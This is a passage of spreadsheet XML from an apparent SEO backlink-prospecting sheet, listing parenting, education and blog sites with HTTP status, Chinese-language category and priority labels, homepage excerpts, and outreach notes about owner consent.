      </x:c>
      <x:c r="H286" s="19" t="str">
        <x:v>https://addiedwyer.com/</x:v>
      </x:c>
      <x:c r="I286" s="19" t="str">
        <x:v>Addie Dwyer</x:v>
      </x:c>
      <x:c r="J286" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K286" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L286" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M286" s="19" t="str">
        <x:v>https://addiedwyer.com/</x:v>
      </x:c>
      <x:c r="N286" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O286" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P286" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q286" s="21" t="str">
        <x:v>Addie Dwyer Skip to content About Me Contact Me Cart Search for: Navigation Travel Itineraries Asia Cambodia Malaysia Vietnam Europe Belgium Bosnia &amp; Herzegovina Croatia England France Serbia Slovenia Spain North America United States South America Colombia How To &amp; Tips Inspiration At Home Kids Recipes Budgeting Preschool Kids Activities GIFT GUIDES Shop Freebies 5 COZY FALL MEALS (QUICK &amp; EASY!) 5 COZY FALL MEALS (QUICK &amp; EASY!) If you need some meal inspiration this fall that check the boxes for being quick, easy and yummy, you’ve come to the right place. As a busy mom of 4 I wanted to share 5 cozy fall meals that are quick and easy, that everyone (including my picky kiddos) enjoy. To see</x:v>
      </x:c>
      <x:c r="R286" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S286" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T286" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://addiedwyer.com</x:v>
      </x:c>
    </x:row>
    <x:row r="287">
      <x:c r="A287" s="18" t="str">
        <x:v>286</x:v>
      </x:c>
      <x:c r="B287" s="19" t="str">
        <x:v>smartkidprintables.com</x:v>
      </x:c>
      <x:c r="C287" s="19" t="str">
        <x:v>https://smartkidprintables.com</x:v>
      </x:c>
      <x:c r="D287" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E287" s="20" t="str">
        <x:v>12</x:v>
      </x:c>
      <x:c r="F287" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G287" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H287" s="19" t="str">
        <x:v>https://smartkidprintables.com/</x:v>
      </x:c>
      <x:c r="I287" s="19" t="str">
        <x:v>Smartkidprintables</x:v>
      </x:c>
      <x:c r="J287" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K287" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L287" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M287" s="19" t="str">
        <x:v>https://smartkidprintables.com/</x:v>
      </x:c>
      <x:c r="N287" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O287" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P287" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q287" s="21" t="str">
        <x:v>Learning &amp; Playing Made Joyful Smartkidprintables  Welcome to Smart Kid Printables Sign in / Sign up  Home Shop Kids Printables New Arrivals Resources About Us Contact Us Support Blog Spark Creativity With Fun Printable Activities Unlock your child’s imagination with Smart Printables for Kids – Fun Learning Games &amp; Activities Explore Creative Printables Printable Resources That Make Learning Fun Make education exciting with kid-friendly resources designed to inspire. From colorful posters to interactive story-based worksheets, our printables turn everyday learning into an enjoyable adventure. Start Smart Learning Empowering Kids' Growth With Digital Resources Help your child build good habits and stay on track with easy</x:v>
      </x:c>
      <x:c r="R287" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S287" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T287" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://smartkidprintables.com</x:v>
      </x:c>
    </x:row>
    <x:row r="288">
      <x:c r="A288" s="18" t="str">
        <x:v>287</x:v>
      </x:c>
      <x:c r="B288" s="19" t="str">
        <x:v>tinasdynamichomeschoolplus.com</x:v>
      </x:c>
      <x:c r="C288" s="19" t="str">
        <x:v>https://tinasdynamichomeschoolplus.com</x:v>
      </x:c>
      <x:c r="D288" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E288" s="20" t="str">
        <x:v>11</x:v>
      </x:c>
      <x:c r="F288" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G288" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H288" s="19" t="str">
        <x:v>https://tinasdynamichomeschoolplus.com/</x:v>
      </x:c>
      <x:c r="I288" s="19" t="str">
        <x:v>Tina's Dynamic Homeschool Plus - Activity, Change, Progress</x:v>
      </x:c>
      <x:c r="J288" s="19" t="str">
        <x:v>Homeschool 教育博客</x:v>
      </x:c>
      <x:c r="K288" s="19" t="str">
        <x:v>高</x:v>
      </x:c>
      <x:c r="L288" s="19" t="str">
        <x:v>工具/服务评测</x:v>
      </x:c>
      <x:c r="M288" s="19" t="str">
        <x:v>https://tinasdynamichomeschoolplus.com/about-me/product-reviews/</x:v>
      </x:c>
      <x:c r="N288" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O288" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P288" s="21" t="str">
        <x:v>有教育产品/服务评测合作说明；适合申请真实使用后的 honest review，不适合单纯链接插入。</x:v>
      </x:c>
      <x:c r="Q288" s="21" t="str">
        <x:v>Activity, Change, Progress Tina's Dynamic Homeschool Plus - Activity, Change, Progress Search this website Facebook Pinterest Instagram YouTube LinkedIn Skip to secondary menu Skip to main content Skip to primary sidebar Skip to footer Tina's Dynamic Homeschool Plus Activity, Change, Progress HOME How to Preschool Kindergarten Elementary Geronimo Stilton Books Middle School High School Science Planner Lapbooks Trioramas History Games LEGO Shop GET STARTED NOW! Learning Styles 7 Step Planner Free Student Planner Free Home Binder Unit Studies Creation to Ancients Mesopotamia Middle Ages to Reform Exploring to Revolution World Wars to Today Science Curriculum More Unit Studies Geography Writing PreK to 12th Free Art Curr</x:v>
      </x:c>
      <x:c r="R288" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S288" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T288" s="21" t="str">
        <x:v>产品免费是优势，但仍需先获得站长同意。 | 请求: https://tinasdynamichomeschoolplus.com</x:v>
      </x:c>
    </x:row>
    <x:row r="289">
      <x:c r="A289" s="18" t="str">
        <x:v>288</x:v>
      </x:c>
      <x:c r="B289" s="19" t="str">
        <x:v>carg4help.org</x:v>
      </x:c>
      <x:c r="C289" s="19" t="str">
        <x:v>https://carg4help.org</x:v>
      </x:c>
      <x:c r="D289" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E289" s="20" t="str">
        <x:v>10</x:v>
      </x:c>
      <x:c r="F289" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G289" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H289" s="19" t="str">
        <x:v>https://carg4help.org/</x:v>
      </x:c>
      <x:c r="I289" s="19" t="str">
        <x:v>Community Association Resource Group – The Best Time to Find an Expert is Before You Need One!</x:v>
      </x:c>
      <x:c r="J289" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K289" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L289" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M289" s="19" t="str">
        <x:v>https://carg4help.org/</x:v>
      </x:c>
      <x:c r="N289" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O289" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P289" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q289" s="21" t="str">
        <x:v>Community Association Resource Group – The Best Time to Find an Expert is Before You Need One! Facebook-f Google-plus-g Youtube Linkedin CARG About CARG Experts Our Events News Free Inquiry CARG About CARG Experts Our Events News Free Inquiry Consultation, Referrals &amp; More for the Community Association Industry THE BEST TIME TO FIND AN EXPERT IS BEFORE YOU NEED ONE! Find Your Pro Consultation, Referrals &amp; More for the Community Association Industry Finding the right expert is no longer a lengthy process! Find Your Pro Consultation, Referrals &amp; More for the Community Association Industry Experienced professionals with a proven track record of excellence! Find Your Pro THE BEST TIME TO FIND AN</x:v>
      </x:c>
      <x:c r="R289" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S289" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T289" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://carg4help.org</x:v>
      </x:c>
    </x:row>
    <x:row r="290">
      <x:c r="A290" s="18" t="str">
        <x:v>289</x:v>
      </x:c>
      <x:c r="B290" s="19" t="str">
        <x:v>thesandrahudson.com</x:v>
      </x:c>
      <x:c r="C290" s="19" t="str">
        <x:v>https://thesandrahudson.com</x:v>
      </x:c>
      <x:c r="D290" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E290" s="20" t="str">
        <x:v>9</x:v>
      </x:c>
      <x:c r="F290" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G290" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H290" s="19" t="str">
        <x:v>https://thesandrahudson.com/</x:v>
      </x:c>
      <x:c r="I290" s="19" t="str">
        <x:v>Blog Page - Sandra Hudson</x:v>
      </x:c>
      <x:c r="J290" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K290" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L290" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M290" s="19" t="str">
        <x:v>https://thesandrahudson.com/</x:v>
      </x:c>
      <x:c r="N290" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O290" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P290" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q290" s="21" t="str">
        <x:v>Blog Page - Sandra Hudson Sandra Hudson Inspiring Women in Life &amp; Business Home About Blog Essential Oils Life &amp; Style Friends From Me To You Healthy Living Mom Life Motivation Network Marketing Parenting Contact Home About Blog Contact LINKS Most Popular Unleashing the Power of Rubi AI Unleashing the Power of Rubi Ai In today’s fast-paced business world, leveraging the potential of artificial intelligence (AI) has become crucial for success. Let’s talk about how content creators, moms, women in business, network marketers, etc. can harness the power of AI to drive growth, enhance productivity, and achieve their business or life [&amp;hellip;] Recently Tavala Trim for Weight Loss How Farmasi Cus</x:v>
      </x:c>
      <x:c r="R290" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S290" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T290" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thesandrahudson.com</x:v>
      </x:c>
    </x:row>
    <x:row r="291">
      <x:c r="A291" s="18" t="str">
        <x:v>290</x:v>
      </x:c>
      <x:c r="B291" s="19" t="str">
        <x:v>marleydoodledigital.com</x:v>
      </x:c>
      <x:c r="C291" s="19" t="str">
        <x:v>https://marleydoodledigital.com</x:v>
      </x:c>
      <x:c r="D291" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E291" s="20" t="str">
        <x:v>8</x:v>
      </x:c>
      <x:c r="F291" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G291" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H291" s="19" t="str">
        <x:v>https://marleydoodledigital.com/</x:v>
      </x:c>
      <x:c r="I291" s="19" t="str">
        <x:v>Marley Doodle Digital - Cute and Functional Templates and Printables</x:v>
      </x:c>
      <x:c r="J291" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K291" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L291" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M291" s="19" t="str">
        <x:v>https://marleydoodledigital.com/</x:v>
      </x:c>
      <x:c r="N291" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O291" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P291" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q291" s="21" t="str">
        <x:v>Your one stop shop for printables, templates, SVG files, and digital downloads! They are fun, cute, and super easy to use! Marley Doodle Digital - Cute and Functional Templates and Printables Skip to content 0 We Are So Happy You Are Here! Home Printables Party Ideas Baby Showers DIY Browse by Type DIY Printables Party Ideas Planners Holiday Games Party Printables Activities 0 Your One Stop Shop for Templates, Printables, and Digital Downloads See all the latest games party ideas printables Activities Get the latest in your inbox! Printables Brighten your day with our fun printable selection! There’s so much to choose from and something for everyone! Latest From The Blog See All &gt; Free Printable Halloween Bingo (25 Unique Cards!) 26 Free Printable Alphabet Coloring Pages for Kids (A to Z) 75+ *Easy* Halloween Cr</x:v>
      </x:c>
      <x:c r="R291" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S291" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T291" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://marleydoodledigital.com</x:v>
      </x:c>
    </x:row>
    <x:row r="292">
      <x:c r="A292" s="18" t="str">
        <x:v>291</x:v>
      </x:c>
      <x:c r="B292" s="19" t="str">
        <x:v>momshealth.co</x:v>
      </x:c>
      <x:c r="C292" s="19" t="str">
        <x:v>https://momshealth.co</x:v>
      </x:c>
      <x:c r="D292" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E292" s="20" t="str">
        <x:v>7</x:v>
      </x:c>
      <x:c r="F292" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G292" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H292" s="19" t="str">
        <x:v>https://momshealth.co/</x:v>
      </x:c>
      <x:c r="I292" s="19" t="str">
        <x:v>MomsHealth.co | Food | Weight Loss | Pregnancy | Yoga | Tips And Tricks - Food | Weight Loss | Pregnancy | Yoga | Tips And Tricks</x:v>
      </x:c>
      <x:c r="J292" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K292" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L292" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M292" s="19" t="str">
        <x:v>https://momshealth.co/</x:v>
      </x:c>
      <x:c r="N292" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O292" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P292" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q292" s="21" t="str">
        <x:v>Food | Weight Loss | Pregnancy | Yoga | Tips And Tricks - MomsHealth.co | Food | Weight Loss | Pregnancy | Yoga | Tips And Tricks MomsHealth.co | Food | Weight Loss | Pregnancy | Yoga | Tips And Tricks - Food | Weight Loss | Pregnancy | Yoga | Tips And Tricks Skip to content Main Menu Recipes Healthy Living Yoga 30 Day Keto Diet Meal Plan Keto Substitutes Printable Guest Post About Search for: Search 15 Best Rice Krispie Treats Recipes with Marshmallow and Brown Butter Whether you call them Rice Krispie Treats, Rice Crispy Treats, or simply chewy marshmallow squares, this nostalgic snack is anything [&amp;hellip;] 15 Best Rice Krispie Treats Recipes with Marshmallow and Brown Butter Read More » 15 Easy Homemade Recipes with Cool Whip If you love desserts that are light, creamy, and incredibly easy to prepare, these cool wh</x:v>
      </x:c>
      <x:c r="R292" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S292" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T292" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://momshealth.co</x:v>
      </x:c>
    </x:row>
    <x:row r="293">
      <x:c r="A293" s="18" t="str">
        <x:v>292</x:v>
      </x:c>
      <x:c r="B293" s="19" t="str">
        <x:v>momreadit.com</x:v>
      </x:c>
      <x:c r="C293" s="19" t="str">
        <x:v>https://momreadit.com</x:v>
      </x:c>
      <x:c r="D293" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E293" s="20" t="str">
        <x:v>7</x:v>
      </x:c>
      <x:c r="F293" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G293" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H293" s="19" t="str">
        <x:v>https://momreadit.com/</x:v>
      </x:c>
      <x:c r="I293" s="19" t="str">
        <x:v>Mom Read It – If the kids are reading it, chances are I have, too.</x:v>
      </x:c>
      <x:c r="J293" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K293" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L293" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M293" s="19" t="str">
        <x:v>https://momreadit.com/</x:v>
      </x:c>
      <x:c r="N293" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O293" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P293" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q293" s="21" t="str">
        <x:v>If the kids are reading it, chances are I have, too. Mom Read It – If the kids are reading it, chances are I have, too. Skip to content Menu About Rosemary Review Policy for MomReadIt Links to Award Winners Mom Read It If the kids are reading it, chances are I have, too. Posted in Uncategorized Ghoul: An imaginary friend… or not? Posted on August 13, 2026 August 11, 2026 by Rosemary Kiladitis Ghoul , by Kasey Iris, (May 2026, Top Shelf), $19.99, ISBN: 9781603095839 Ages 13-17 Growing up, Lyn and her best friend, Megan, swore to be friends forever; that all changed when Megan died at age 14. Lyn and her family move into a new apartment, but Lyn is overwhelmed by the gossipy new neighbors. One night, a ghoul climbs out of her comic book while Ly</x:v>
      </x:c>
      <x:c r="R293" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S293" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T293" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://momreadit.com</x:v>
      </x:c>
    </x:row>
    <x:row r="294">
      <x:c r="A294" s="18" t="str">
        <x:v>293</x:v>
      </x:c>
      <x:c r="B294" s="19" t="str">
        <x:v>loridavisstudio.com</x:v>
      </x:c>
      <x:c r="C294" s="19" t="str">
        <x:v>https://loridavisstudio.com</x:v>
      </x:c>
      <x:c r="D294" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E294" s="20" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="F294" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G294" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H294" s="19" t="str">
        <x:v>https://loridavisstudio.com/</x:v>
      </x:c>
      <x:c r="I294" s="19" t="str">
        <x:v>Lori Davis Studio – Sheet Music, Teaching Ideas, and More</x:v>
      </x:c>
      <x:c r="J294" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K294" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L294" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M294" s="19" t="str">
        <x:v>https://loridavisstudio.com/</x:v>
      </x:c>
      <x:c r="N294" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O294" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P294" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q294" s="21" t="str">
        <x:v>This is the home page's excerpt Lori Davis Studio – Sheet Music, Teaching Ideas, and More Skip to content Lori Davis Studio Sheet Music, Teaching Ideas, and More Menu Home Blog Sheet Music Teaching Lead Sheets Repertoire About Contact Home I’m Lori Davis, and welcome to my studio! I live in St. Louis, where I teach piano, sing in the St Louis Chamber Chorus , a professional choir, and serve at church as a violinist, pianist, and organist. On this site, I organize my music arrangements , my plans and ideas about teaching music , and more . Tags advancedstudents arrangement Assessment attitude boardgamemusictwist celloviolinpiano ChineseNewYear choral chords Christmas Composing drill drums dynamics eartraining fakebook fasta</x:v>
      </x:c>
      <x:c r="R294" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S294" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T294" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://loridavisstudio.com</x:v>
      </x:c>
    </x:row>
    <x:row r="295">
      <x:c r="A295" s="18" t="str">
        <x:v>294</x:v>
      </x:c>
      <x:c r="B295" s="19" t="str">
        <x:v>barsbabes.nl</x:v>
      </x:c>
      <x:c r="C295" s="19" t="str">
        <x:v>https://barsbabes.nl</x:v>
      </x:c>
      <x:c r="D295" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E295" s="20" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="F295" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G295" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H295" s="19" t="str">
        <x:v>https://barsbabes.nl/</x:v>
      </x:c>
      <x:c r="I295" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J295" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K295" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L295" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M295" s="19" t="str">
        <x:v>https://barsbabes.nl/</x:v>
      </x:c>
      <x:c r="N295" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O295" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P295" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q295" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R295" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S295" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T295" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://barsbabes.nl</x:v>
      </x:c>
    </x:row>
    <x:row r="296">
      <x:c r="A296" s="18" t="str">
        <x:v>295</x:v>
      </x:c>
      <x:c r="B296" s="19" t="str">
        <x:v>anastasiablogger.com</x:v>
      </x:c>
      <x:c r="C296" s="19" t="str">
        <x:v>https://anastasiablogger.com</x:v>
      </x:c>
      <x:c r="D296" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E296" s="20" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="F296" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G296" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H296" s="19" t="str">
        <x:v>https://anastasiablogger.com/</x:v>
      </x:c>
      <x:c r="I296" s="19" t="str">
        <x:v>Anastasia Blogger: Start a Successful Blog | Pinterest Marketing Tips</x:v>
      </x:c>
      <x:c r="J296" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K296" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L296" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M296" s="19" t="str">
        <x:v>https://anastasiablogger.com/</x:v>
      </x:c>
      <x:c r="N296" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O296" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P296" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q296" s="21" t="str">
        <x:v>I help people start a profitable blog or an online business and grow it fast using Pinterest marketing strategies for organic free traffic. Anastasia Blogger: Start a Successful Blog | Pinterest Marketing Tips Anastasia Blogger Navigation Start a Blog Blogging Courses Resources Work With Me Shop About Start a Blog Blogging Courses Resources Work With Me Shop About Free Pinterest Masterclass Sign up for my free Masterclass and grow your online business with free Pinterest Traffic. Learn how I drive over 300,000/mo pageviews to my site Reserve your seat! Free Pinterest Masterclass Sign up for my free Masterclass and grow your online business with free Pinterest Traffic. Learn how I drive over 300,000/mo pageviews to my site Reserve your seat! Free Pinterest Masterclass Sign up for my free Masterclass and grow your online business </x:v>
      </x:c>
      <x:c r="R296" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S296" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T296" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://anastasiablogger.com</x:v>
      </x:c>
    </x:row>
    <x:row r="297">
      <x:c r="A297" s="18" t="str">
        <x:v>296</x:v>
      </x:c>
      <x:c r="B297" s="19" t="str">
        <x:v>pages.dev</x:v>
      </x:c>
      <x:c r="C297" s="19" t="str">
        <x:v>https://pages.dev</x:v>
      </x:c>
      <x:c r="D297" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E297" s="20" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="F297" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G297" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H297" s="19" t="str">
        <x:v>https://www.cloudflare.com/products/pages/</x:v>
      </x:c>
      <x:c r="I297" s="19" t="str">
        <x:v>Cloudflare Pages - Serverless Full-Stack Platform</x:v>
      </x:c>
      <x:c r="J297" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K297" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L297" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M297" s="19" t="str">
        <x:v>https://www.cloudflare.com/products/pages/</x:v>
      </x:c>
      <x:c r="N297" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O297" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P297" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q297" s="21" t="str">
        <x:v>Build, deploy, and deliver full-stack applications quickly with Cloudflare Pages. A serverless platform for frontend developers. Cloudflare Pages - Serverless Full-Stack Platform Products Solutions Resources Pricing Login Dashboard Contact sales Start building Dashboard Login Cloudflare Pages Build and deploy full-stack applications instantly Cloudflare Pages is a serverless platform that lets you build, collaborate, test, and deploy applications quickly. Developers, designers, and product teams can work together with minimal configuration needed. Start building for free View docs Rapid Deployment Deploy full-stack applications quickly with Cloudflare Pages. A serverless platform for building and delivering trusted applications. Effortless Collaboration Share projects using unique, protected links with designers and d</x:v>
      </x:c>
      <x:c r="R297" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S297" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T297" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://pages.dev</x:v>
      </x:c>
    </x:row>
    <x:row r="298">
      <x:c r="A298" s="18" t="str">
        <x:v>297</x:v>
      </x:c>
      <x:c r="B298" s="19" t="str">
        <x:v>coalitionbrewing.com</x:v>
      </x:c>
      <x:c r="C298" s="19" t="str">
        <x:v>https://coalitionbrewing.com</x:v>
      </x:c>
      <x:c r="D298" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E298" s="20" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="F298" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G298" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H298" s="19" t="str">
        <x:v>https://coalitionbrewing.com/</x:v>
      </x:c>
      <x:c r="I298" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J298" s="19" t="str">
